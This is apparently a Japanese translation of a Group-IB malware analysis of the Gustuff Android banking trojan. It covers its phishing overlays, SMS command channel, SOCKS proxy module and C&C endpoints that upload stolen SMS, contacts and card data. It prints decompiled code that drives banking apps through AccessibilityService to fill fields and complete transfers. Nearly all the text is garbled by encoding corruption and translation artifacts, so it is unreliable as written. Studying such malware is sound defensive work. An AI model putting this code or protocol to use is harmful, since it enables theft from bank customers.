- èš±å¯ãªãŒããŒã¬ã€ â æ©èœã¯å®è£ ãããŠããŸããïŒã³ãã³ãå®è¡ã«å¯Ÿããå¿ç㯠{"message":"Not support"} ãŸã㯠{"message":"low sdk"} ã§ãïŒ
- ãžã§ã¹ãã£ãŒ â æ©èœã¯å®è£ ãããŠããŸããïŒã³ãã³ãå®è¡ã«å¯Ÿããå¿ç㯠{"message":"Not support"} ãŸã㯠{"message":"Low API"} ã§ãïŒ
- ããŒããã·ã§ã³ â ãã®ã³ãã³ãã¯ãã¢ããªã±ãŒã·ã§ã³ã®ã¢ã¯ã»ã¹èš±å¯ãèŠæ±ããããã«å¿
èŠã§ãã ãã ããã¯ãšãªæ©èœã¯å®è£
ãããŠããªããããã³ãã³ãã®æå³ã¯ãããŸããã èŠæ±ãããæš©éã®ãªã¹ãã¯ããpermissionsãããŒãå«ã JSON é
åãšããŠæäŸãããŸãã æšæºãªã¹ã:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- éãã â ãã£ãã·ã³ã°ãŠã£ã³ããŠã衚瀺ããŸãã ãµãŒããŒããã®ãã©ã¡ãŒã¿ã«å¿ããŠãã¢ããªã±ãŒã·ã§ã³ã¯æ¬¡ã®ãã£ãã·ã³ã° ãŠã£ã³ããŠã衚瀺ããå ŽåããããŸãã
- ãã£ã¬ã¯ããªå ã®ãã¡ã€ã«ã«å 容ãæžã蟌ãŸãããã£ãã·ã³ã° ãŠã£ã³ããŠã衚瀺ãã <%å€éšãã£ã¬ã¯ããª%>/hgps/<%param_filename%>ã ãŠãŒã¶ãŒããŠã£ã³ããŠãšå¯Ÿè©±ããçµæã¯ã次ã®å®å ã«éä¿¡ãããŸãã <%CnC%>/records.php
- ã¢ãã¬ã¹ããå 容ãäºåã«èªã¿èŸŒãŸãããã£ãã·ã³ã° ãŠã£ã³ããŠã衚瀺ããŸãã <%url_param%>?id=<%bot_id%>&app=<%packagename%>ã ãŠãŒã¶ãŒããŠã£ã³ããŠãšå¯Ÿè©±ããçµæã¯ã次ã®å®å ã«éä¿¡ãããŸãã <%CnC%>/records.php
- Google Play ã«ãŒããè£ ã£ããã£ãã·ã³ã° ãŠã£ã³ããŠã衚瀺ããŸãã
- çžäºäœçšç â ãã®ã³ãã³ãã¯ãAcessibilityService ã䜿çšããŠä»ã®ã¢ããªã±ãŒã·ã§ã³ã®ãŠã£ã³ããŠèŠçŽ ãšå¯Ÿè©±ããããã«èšèšãããŠããŸãã ã€ã³ã¿ã©ã¯ã·ã§ã³ããã°ã©ã ã«ã¯ç¹å¥ãªãµãŒãã¹ãå®è£
ãããŠããŸãã 調æ»äžã®ã¢ããªã±ãŒã·ã§ã³ã¯ Windows ãšå¯Ÿè©±ã§ããŸãã
- çŸåšæŽ»åäžã ãã®å Žåããã©ã¡ãŒã¿ãŒã«ã¯ã察話ããå¿ èŠããããªããžã§ã¯ãã® ID ãŸãã¯ããã¹ã (åå) ãå«ãŸããŸãã
- ã³ãã³ãã®å®è¡æã«ãŠãŒã¶ãŒã«è¡šç€ºãããŸãã ã¢ããªã±ãŒã·ã§ã³ã¯ ID ã«ãã£ãŠ Windows ãéžæããŸãã
ãªããžã§ã¯ããåãåã£ã ã¢ã¯ã»ã·ããªãã£ããŒãæ å ± 察象ã®ãŠã£ã³ããŠèŠçŽ ã«ã€ããŠãã¢ããªã±ãŒã·ã§ã³ã¯ãã©ã¡ãŒã¿ãŒã«å¿ããŠæ¬¡ã®ã¢ã¯ã·ã§ã³ãå®è¡ã§ããŸãã
- ãã©ãŒã«ã¹ â ãªããžã§ã¯ãã«ãã©ãŒã«ã¹ãèšå®ããŸãã
- ã¯ãªã㯠â ãªããžã§ã¯ããã¯ãªãã¯ããŸãã
- actionId â ID ã«ãã£ãŠã¢ã¯ã·ã§ã³ãå®è¡ããŸãã
- setText â ãªããžã§ã¯ãã®ããã¹ããå€æŽããŸãã ããã¹ãã®å€æŽã¯ XNUMX ã€ã®æ¹æ³ã§å¯èœã§ã: ã¢ã¯ã·ã§ã³ãå®è¡ãã ACTION_SET_TEXT (ææããããã€ã¹ã® Android ããŒãžã§ã³ã以äžã®å Žå ããªããã)ããŸãã¯æååãã¯ãªããããŒãã«é 眮ããŠãªããžã§ã¯ãã«è²Œãä»ããŸã (å€ãããŒãžã§ã³ã®å Žå)ã ãã®ã³ãã³ãã¯ãéè¡ã¢ããªã±ãŒã·ã§ã³ã®ããŒã¿ãå€æŽããããã«äœ¿çšã§ããŸãã
2. PARAMS_ACTIONS - ãšåã PARAMS_ACTIONãã³ãã³ãã® JSON é åã®ã¿ãå°çããŸãã
ä»ã®ã¢ããªã±ãŒã·ã§ã³ã®ãŠã£ã³ããŠèŠçŽ ãšå¯Ÿè©±ããæ©èœãã©ã®ãããªãã®ã§ãããã«èå³ããã人ã¯å€ããšæãããŸãã ãã®æ©èœã Gustuff ã«å®è£ ãããæ¹æ³ã¯æ¬¡ã®ãšããã§ãã
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}
ããã¹ã眮ææ©èœïŒ
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}
ãããã£ãŠãã³ã³ãããŒã« ãµãŒããŒãæ£ããèšå®ãããŠããã°ãGustuff ã¯éè¡ã¢ããªã±ãŒã·ã§ã³ã®ããã¹ã ãã£ãŒã«ãã«å ¥åããååŒãå®äºããããã«å¿ èŠãªãã¿ã³ãã¯ãªãã¯ããããšãã§ããŸãã ãã®ããã€ã®æšéŠ¬ã¯ãã¢ããªã±ãŒã·ã§ã³ã«ãã°ã€ã³ããå¿ èŠãããããŸãããPUSH éç¥ã衚瀺ããã³ãã³ããéä¿¡ãã以åã«ã€ã³ã¹ããŒã«ãããéè¡ã¢ããªã±ãŒã·ã§ã³ãéãã ãã§ååã§ãã ãŠãŒã¶ãŒã¯èªåèªèº«ãèªèšŒãããã®åŸãGustuff ãè»ã«ã¬ãœãªã³ãå ¥ããããšãã§ããããã«ãªããŸãã
SMSã¡ãã»ãŒãžåŠçã¢ãžã¥ãŒã«
ã¢ããªã±ãŒã·ã§ã³ã¯ãææããããã€ã¹ã SMS ã¡ãã»ãŒãžãåãå ¥ããããã®ã€ãã³ã ãã³ãã©ãŒãã€ã³ã¹ããŒã«ããŸãã 調æ»å¯Ÿè±¡ã®ã¢ããªã±ãŒã·ã§ã³ã¯ãSMS ã¡ãã»ãŒãžã®æ¬æã«å«ãŸããã³ãã³ãããªãã¬ãŒã¿ãŒããåä¿¡ã§ããŸãã ã³ãã³ãã¯æ¬¡ã®åœ¢åŒã§æäŸãããŸãã
7!5=<%Base64 ãšã³ã³ãŒããããã³ãã³ã%>
ã¢ããªã±ãŒã·ã§ã³ã¯ããã¹ãŠã®åä¿¡ SMS ã¡ãã»ãŒãžå ã®æååãæ€çŽ¢ããŸãã 7!5=ãæååãæ€åºããããšããªãã»ãã 64 㧠Base4 ããæååããã³ãŒãããã³ãã³ããå®è¡ããŸãã ã³ãã³ã㯠CnC ã®ã³ãã³ããšäŒŒãŠããŸãã å®è¡çµæã¯ãã³ãã³ããéä¿¡ããçªå·ãšåãçªå·ã«éä¿¡ãããŸãã å¿ç圢åŒ:
7*5=<%ãresult_code ã³ãã³ããã® Base64 ãšã³ã³ãŒã%>
ãªãã·ã§ã³ã§ãã¢ããªã±ãŒã·ã§ã³ã¯åä¿¡ãããã¹ãŠã®ã¡ãã»ãŒãžãã«ãŒãçªå·ã«éä¿¡ã§ããŸãã ãããè¡ãã«ã¯ãèšå®ãã¡ã€ã«ã§ã«ãŒãçªå·ãæå®ããã¡ãã»ãŒãž ãªãã€ã¬ã¯ã ãã©ã°ãèšå®ããå¿ èŠããããŸãã SMS ã¡ãã»ãŒãžã¯æ¬¡ã®åœ¢åŒã§æ»æè ã®çªå·ã«éä¿¡ãããŸãã
<%Fromnumber%> - <%Timeã圢åŒ: dd/MM/yyyy HH:mm:ss%> <%SMS body%>
ãŸãããªãã·ã§ã³ã§ãã¢ããªã±ãŒã·ã§ã³ã¯ CnC ã«ã¡ãã»ãŒãžãéä¿¡ã§ããŸãã SMS ã¡ãã»ãŒãžã¯ JSON 圢åŒã§ãµãŒããŒã«éä¿¡ãããŸãã
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}
ãã©ã°ãç«ã£ãŠããå Žå nameGenerator("DEFAULT_APP_SMS") â ã¢ããªã±ãŒã·ã§ã³ã¯ SMS ã¡ãã»ãŒãžã®åŠçãåæ¢ããåä¿¡ã¡ãã»ãŒãžã®ãªã¹ããã¯ãªã¢ããŸãã
ãããã·ã¢ãžã¥ãŒã«
調æ»äžã®ã¢ããªã±ãŒã·ã§ã³ã«ã¯ãæ§æãå«ãéçãã£ãŒã«ããå«ãå¥ã®ã¯ã©ã¹ãæ〠Backconnect Proxy ã¢ãžã¥ãŒã« (以äžããããã· ã¢ãžã¥ãŒã«ãšåŒã³ãŸã) ãå«ãŸããŠããŸãã æ§æããŒã¿ã¯ãµã³ãã«ã«ã¯ãªã¢åœ¢åŒã§ä¿åãããŸãã
ãããã· ã¢ãžã¥ãŒã«ã«ãã£ãŠå®è¡ããããã¹ãŠã®ã¢ã¯ã·ã§ã³ã¯ãã¡ã€ã«ã«èšé²ãããŸãã ãããè¡ãããã«ãå€éšã¹ãã¬ãŒãžå ã®ã¢ããªã±ãŒã·ã§ã³ã¯ããã° ãã¡ã€ã«ãä¿åããããlogsããšãããã£ã¬ã¯ã㪠(æ§æã¯ã©ã¹ã® ProxyConfigClass.logsDir ãã£ãŒã«ã) ãäœæããŸãã ãã°ã¯æ¬¡ã®ååã®ãã¡ã€ã«ã«èšé²ãããŸãã
- main.txt â CommandServer ãšããã¯ã©ã¹ã®äœæ¥ããã®ãã¡ã€ã«ã«èšé²ãããŸãã 以äžã§ã¯ãæåå str ããã®ãã¡ã€ã«ã«èšé²ããããšã mainLog(str) ãšè¡šèšããŸãã
- ã»ãã·ã§ã³-<%id%>.txt â ãã®ãã¡ã€ã«ã«ã¯ãç¹å®ã®ãããã· ã»ãã·ã§ã³ã«é¢é£ä»ãããããã° ããŒã¿ãä¿åãããŸãã 以äžã§ã¯ãæåå str ããã®ãã¡ã€ã«ã«èšé²ããããšã sessionLog (str) ãšè¡šèšããŸãã
- ãµãŒããŒ.txt â ãã®ãã¡ã€ã«ã¯ãäžèšã®ãã¡ã€ã«ã«æžã蟌ãŸãããã¹ãŠã®ããŒã¿ãèšé²ããããã«äœ¿çšãããŸãã
ãã°ããŒã¿åœ¢åŒ:
<%Date%> [ã¹ã¬ãã[<%ã¹ã¬ãã ID%>]ãID[]]: ãã°æåå
ãããã· ã¢ãžã¥ãŒã«ã®æäœäžã«çºçããäŸå€ããã¡ã€ã«ã«èšé²ãããŸãã ãããè¡ãããã«ãã¢ããªã±ãŒã·ã§ã³ã¯æ¬¡ã®åœ¢åŒã§ JSON ãªããžã§ã¯ããçæããŸãã
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}
次ã«ããããæååè¡šçŸã«å€æããŠãã°ã«èšé²ããŸãã
ãããã· ã¢ãžã¥ãŒã«ã¯ã察å¿ããã³ãã³ããåä¿¡ããåŸã«èµ·åãããŸãã ãããã· ã¢ãžã¥ãŒã«ãèµ·åããã³ãã³ããåä¿¡ãããšãã¢ããªã±ãŒã·ã§ã³ã¯ ãšåŒã°ãããµãŒãã¹ãéå§ããŸãã ã¡ã€ã³ãµãŒãã¹ããããã· ã¢ãžã¥ãŒã«ã®åäœã®ç®¡çãã€ãŸãéå§ãšåæ¢ãæ åœããŸãã
ãµãŒãã¹éå§ã®æ®µé:
1. XNUMX åã« XNUMX åå®è¡ãããã¿ã€ããŒãéå§ãããããã· ã¢ãžã¥ãŒã«ã®ã¢ã¯ãã£ããã£ããã§ãã¯ããŸãã ã¢ãžã¥ãŒã«ãã¢ã¯ãã£ãã§ãªãå Žåã¯ãã¢ãžã¥ãŒã«ãèµ·åãããŸãã
ã€ãã³ããããªã¬ãŒããããšãã android.net.conn.CONNECTIVITY_CHANGE ãããã·ã¢ãžã¥ãŒã«ãèµ·åããŸãã
2. ã¢ããªã±ãŒã·ã§ã³ã¯ãã©ã¡ãŒã¿ã䜿çšããŠãŠã§ã€ã¯ããã¯ãäœæããŸã ããŒã·ã£ã«_ãŠã§ã€ã¯_ãã㯠ãããŠåœŒãæãŸããŸãã ããã«ãããããã€ã¹ã® CPU ãã¹ãªãŒã ã¢ãŒãã«ãªãã®ãé²ããŸãã
3. ãããã·ã¢ãžã¥ãŒã«ã®ã³ãã³ãåŠçã¯ã©ã¹ãèµ·åããæåã«è¡ããã°ã«èšé²ããŸãã mainLog("ãµãŒããŒã®èµ·å") О
Server::start() host[<%proxy_cnc%>]ãcommandPort[<%command_port%>]ãproxyPort[<%proxy_port%>]
ã©ã proxy_cncãcommand_portãããã³ proxy_port â ãããã·ãµãŒããŒèšå®ããååŸãããã©ã¡ãŒã¿ã
ã³ãã³ãåŠçã¯ã©ã¹ãåŒã³åºãããŸãã ã³ãã³ãæ¥ç¶ã èµ·åçŽåŸã«æ¬¡ã®ã¢ã¯ã·ã§ã³ãå®è¡ããŸãã
4. ã«æ¥ç¶ããŸã ProxyConfigClass.host: ProxyConfigClass.commandPort ãããŠãææããããã€ã¹ã«é¢ããããŒã¿ã JSON 圢åŒã§éä¿¡ããŸãã
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}
ããã§ïŒ
- id â èå¥åããxããšããååã®å ±æèšå®ãã¡ã€ã«ãããidããã£ãŒã«ãã®å€ãååŸããããšããŸãã ãã®å€ãååŸã§ããªãã£ãå Žåã¯ãæ°ããå€ãçæãããŸãã ãããã£ãŠããããã· ã¢ãžã¥ãŒã«ã«ã¯ç¬èªã®èå¥åããããããã ID ãšåæ§ã«çæãããŸãã
- imei â ããã€ã¹ã® IMEIã å€ã®ååŸããã»ã¹äžã«ãšã©ãŒãçºçããå Žåããã®ãã£ãŒã«ãã®ä»£ããã«ãšã©ãŒ ããã¹ã ã¡ãã»ãŒãžãæžã蟌ãŸããŸãã
- imsi â ããã€ã¹ã®åœéã¢ãã€ã«å å ¥è IDã å€ã®ååŸããã»ã¹äžã«ãšã©ãŒãçºçããå Žåããã®ãã£ãŒã«ãã®ä»£ããã«ãšã©ãŒ ããã¹ã ã¡ãã»ãŒãžãæžã蟌ãŸããŸãã
- ã¢ãã« â ãšã³ããŠãŒã¶ãŒã«è¡šç€ºãããæçµè£œåã®ååã
- 補é å â 補å/ããŒããŠã§ã¢ã®è£œé å (Build.MANUFACTURER)ã
- androidVersion - ã<%release_version%> (<%os_version%>),<%sdk_version%>ã圢åŒã®æåå
- åœ â ããã€ã¹ã®çŸåšã®å Žæã
- PartnerId ã¯ç©ºã®æååã§ãã
- packageName â ããã±ãŒãžåã
- networkType â çŸåšã®ãããã¯ãŒã¯æ¥ç¶ã®ã¿ã€ã (äŸ: ãWIFIãããMOBILEã)ã ãšã©ãŒã®å Žåã¯nullãè¿ããŸãã
- hasGsmSupport â true â é»è©±æ©ã GSM ããµããŒãããå Žåããã以å€ã®å Žå㯠falseã
- simReady â SIM ã«ãŒãã®ç¶æ ã
- sim Country - ISO åœã³ãŒã (SIM ã«ãŒããããã€ããŒã«åºã¥ã)ã
- networkOperator â ãªãã¬ãŒã¿ãŒåã å€ã®ååŸããã»ã¹äžã«ãšã©ãŒãçºçããå Žåããã®ãã£ãŒã«ãã®ä»£ããã«ãšã©ãŒ ããã¹ã ã¡ãã»ãŒãžãæžã蟌ãŸããŸãã
- simOperator â ãµãŒãã¹ ãããã€ããŒå (SPN)ã å€ã®ååŸããã»ã¹äžã«ãšã©ãŒãçºçããå Žåããã®ãã£ãŒã«ãã®ä»£ããã«ãšã©ãŒ ããã¹ã ã¡ãã»ãŒãžãæžã蟌ãŸããŸãã
- version - ãã®ãã£ãŒã«ã㯠config ã¯ã©ã¹ã«ä¿åãããŸãããã¹ãããããããã®ããŒãžã§ã³ã§ã¯ãã1.6ãã«çãããªããŸãã
5. ãµãŒããŒããã®ã³ãã³ããåŸ ã€ã¢ãŒãã«åãæ¿ãããŸãã ãµãŒããŒããã®ã³ãã³ãã¯æ¬¡ã®åœ¢åŒã«ãªããŸãã
- 0 ãªãã»ãã - ã³ãã³ã
- 1 ãªãã»ãã â sessionId
- 2 ãªãã»ãã â é·ã
- 4 ãªãã»ãã - ããŒã¿
ã³ãã³ããå°çãããšãã¢ããªã±ãŒã·ã§ã³ã¯ä»¥äžããã°ã«èšé²ããŸãã
mainLog("ããã㌠{ sessionId<%id%>]ãã¿ã€ã[<%command%>]ãé·ã[<%length%>] }")
ãµãŒããŒããã¯æ¬¡ã®ã³ãã³ããå¯èœã§ãã
åå | Command | äžã€ | 説æ |
---|---|---|---|
æ¥ç¶ID | 0 | æ¥ç¶ ID | æ°ããæ¥ç¶ãäœæãã |
SLEEP | 3 | Time | ãããã·ã¢ãžã¥ãŒã«ãäžæåæ¢ããŸã |
åç | 4 | - | PONG ã¡ãã»ãŒãžãéä¿¡ãã |
PONG ã¡ãã»ãŒãžã¯ 4 ãã€ãã§æ§æããã次ã®ããã«ãªããŸãã 0x04000000.
connectionId ã³ãã³ããåä¿¡ãããšã (æ°ããæ¥ç¶ãäœæãããã) ã³ãã³ãæ¥ç¶ ã¯ã©ã¹ã®ã€ã³ã¹ã¿ã³ã¹ãäœæããŸã ãããã·æ¥ç¶.
- XNUMX ã€ã®ã¯ã©ã¹ããããã·åŠçã«åå ããŸãã ãããã·æ¥ç¶ О endã ã¯ã©ã¹ãäœæãããšã ãããã·æ¥ç¶ ã¢ãã¬ã¹ã«æ¥ç¶ãã ProxyConfigClass.host: ProxyConfigClass.proxyPort ãããŠãJSON ãªããžã§ã¯ããæž¡ããŸãã
{
"id":<%connectionId%>
}
ããã«å¿ããŠããµãŒããŒã¯ãæ¥ç¶ã確ç«ããå¿ èŠããããªã¢ãŒã ãµãŒããŒã®ã¢ãã¬ã¹ãå«ã SOCKS5 ã¡ãã»ãŒãžãéä¿¡ããŸãã ãã®ãµãŒããŒãšã®å¯Ÿè©±ã¯ã¯ã©ã¹ãéããŠè¡ãããŸã endã æ¥ç¶ã»ããã¢ããã¯æ¬¡ã®ããã«æŠç¥çã«è¡šãããšãã§ããŸãã
ãããã¯ãŒã¯ã€ã³ã¿ã©ã¯ã·ã§ã³
ãããã¯ãŒã¯ ã¹ããã¡ãŒã«ãããã©ãã£ãã¯åæãé²ãããã«ãCnC ãµãŒããŒãšã¢ããªã±ãŒã·ã§ã³éã®å¯Ÿè©±ã SSL ãããã³ã«ã䜿çšããŠä¿è·ã§ããŸãã ãµãŒããŒãšã®éã§éåä¿¡ããããã¹ãŠã®ããŒã¿ã¯ JSON 圢åŒã§è¡šç€ºãããŸãã ã¢ããªã±ãŒã·ã§ã³ã¯åäœäžã«æ¬¡ã®ãªã¯ãšã¹ããå®è¡ããŸãã
- http://<%CnC%>/api/v1/set_state.php â ã³ãã³ãã®å®è¡çµæã
- http://<%CnC%>/api/v1/get.php â ã³ãã³ããåä¿¡ããŠââããŸãã
- http://<%CnC%>/api/v1/load_sms.php â ææããããã€ã¹ãã SMS ã¡ãã»ãŒãžãããŠã³ããŒãããã
- http://<%CnC%>/api/v1/load_ab.php â ææããããã€ã¹ããé£çµ¡å ã®ãªã¹ããã¢ããããŒãããã
- http://<%CnC%>/api/v1/aevents.php â ãªã¯ãšã¹ãã¯ãèšå®ãã¡ã€ã«ã«ãããã©ã¡ãŒã¿ãæŽæ°ãããšãã«è¡ãããŸãã
- http://<%CnC%>/api/v1/set_card.php â Google Play ããŒã±ãããè£ ã£ããã£ãã·ã³ã°ãŠã£ã³ããŠã䜿çšããŠååŸããããŒã¿ãã¢ããããŒãããã
- http://<%CnC%>/api/v1/logs.php â ãã°ããŒã¿ã®ã¢ããããŒãã
- http://<%CnC%>/api/v1/records.php â ãã£ãã·ã³ã°ãŠã£ã³ããŠãéããŠååŸããããŒã¿ã®ã¢ããããŒãã
- http://<%CnC%>/api/v1/set_error.php â çºçãããšã©ãŒã®éç¥ã
æèš
ã¢ãã€ã« ããã€ã®æšéŠ¬ã®è åšãã顧客ãä¿è·ããããã«ãäŒæ¥ã¯ããŠãŒã¶ãŒ ããã€ã¹ã«è¿œå ã®ãœãããŠã§ã¢ãã€ã³ã¹ããŒã«ããããšãªããæªæã®ããã¢ã¯ãã£ããã£ãç£èŠããã³é²æ¢ã§ããå æ¬çãªãœãªã¥ãŒã·ã§ã³ã䜿çšããå¿ èŠããããŸãã
ãããè¡ãã«ã¯ãã¯ã©ã€ã¢ã³ããšã¢ããªã±ãŒã·ã§ã³èªäœã®äž¡æ¹ã®åäœãåæãããã¯ãããžãŒã䜿çšããŠãã¢ãã€ã« ããã€ã®æšéŠ¬ãæ€åºããããã®çœ²åæ¹æ³ã匷åããå¿ èŠããããŸãã ãã®ä¿è·ã«ã¯ãããžã¿ã«æçŽæè¡ã䜿çšããããã€ã¹èå¥æ©èœãå«ããå¿ èŠããããŸããããã«ãããã¢ã«ãŠã³ããéå®åããã€ã¹ãã䜿çšããããã§ã«è©æ¬ºåž«ã®æã«æž¡ã£ãå Žåãææ¡ã§ããããã«ãªããŸãã
åºæ¬çã«éèŠãªç¹ã¯ãã¯ãã¹ãã£ãã«åæãå©çšã§ããããšã§ããããã«ãããäŒæ¥ã¯ã€ã³ã¿ãŒãããã ãã§ãªããã¢ãã€ã« ãã£ãã«ã§ãçºçãããªã¹ã¯ãå¶åŸ¡ã§ããŸããããšãã°ãã¢ãã€ã« ãã³ãã³ã°ã®ã¢ããªã±ãŒã·ã§ã³ãä»®æ³é貚ããã®ä»ã®ååŒã®ã¢ããªã±ãŒã·ã§ã³ãªã©ã§ããéèååŒã
ãŠãŒã¶ãŒã®ããã®å®å šã«ãŒã«:
- Android OS ãæèŒããã¢ãã€ã« ããã€ã¹ã«ã¯ãGoogle Play 以å€ã®ãœãŒã¹ããã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ããªãã§ãã ãããã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠèŠæ±ãããæš©å©ã«ã¯ç¹ã«æ³šæããŠãã ããã
- Android OS ã¢ããããŒããå®æçã«ã€ã³ã¹ããŒã«ããŸãã
- ããŠã³ããŒããããã¡ã€ã«ã®æ¡åŒµåã«æ³šæããŠãã ããã
- çããããªãœãŒã¹ã«ã¯ã¢ã¯ã»ã¹ããªãã§ãã ããã
- SMS ã¡ãã»ãŒãžã§åä¿¡ãããªã³ã¯ãã¯ãªãã¯ããªãã§ãã ããã
äž»æŒ ã»ãã§ã³ã»ãã¬ãã§ã¯, Group-IB Computer Forensics Laboratory ã®ãã«ãŠã§ã¢ç 究ã®ãžã¥ã㢠ã¹ãã·ã£ãªã¹ãã
åºæïŒ habr.com